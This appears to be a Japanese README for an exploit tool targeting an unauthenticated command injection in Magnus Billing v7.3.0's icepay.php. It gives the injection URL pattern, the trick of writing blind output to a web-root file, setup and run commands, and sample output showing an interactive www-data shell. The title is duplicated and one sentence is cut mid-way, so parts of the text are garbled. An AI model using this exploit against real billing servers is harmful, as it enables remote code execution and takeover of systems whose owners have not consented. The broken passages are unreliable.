
Magnus Billing v7.3.0 における認証なしのコマンドインジェクション脆弱性。
Magnus Billing v7.3.0 における認証不要のコマンドインジェクションの脆弱性。
icepay.phpの GET パラメータdemocはサニタイズなしでシェル関数に直接渡され、Webサーバーユーザーとして任意のコマンド実行を許します。このインジェクションはブラインドです — 出力はHTTPレスポンスに反映されません — そのため、このエクスプロイトは各コマンドの出力をWebルート内のファイルにリダイレクトし、HTTP経由で取得します。
/mbilling/lib/icepay/icepay.php?democ=;<command>; にGETリクエストを送信します。out.txt) にリダイレクトします。ターゲットが異なるWebルートパスを使用している場合は、スクリプト上部の
OUTPUT_FILEを調整してください。
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
例:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data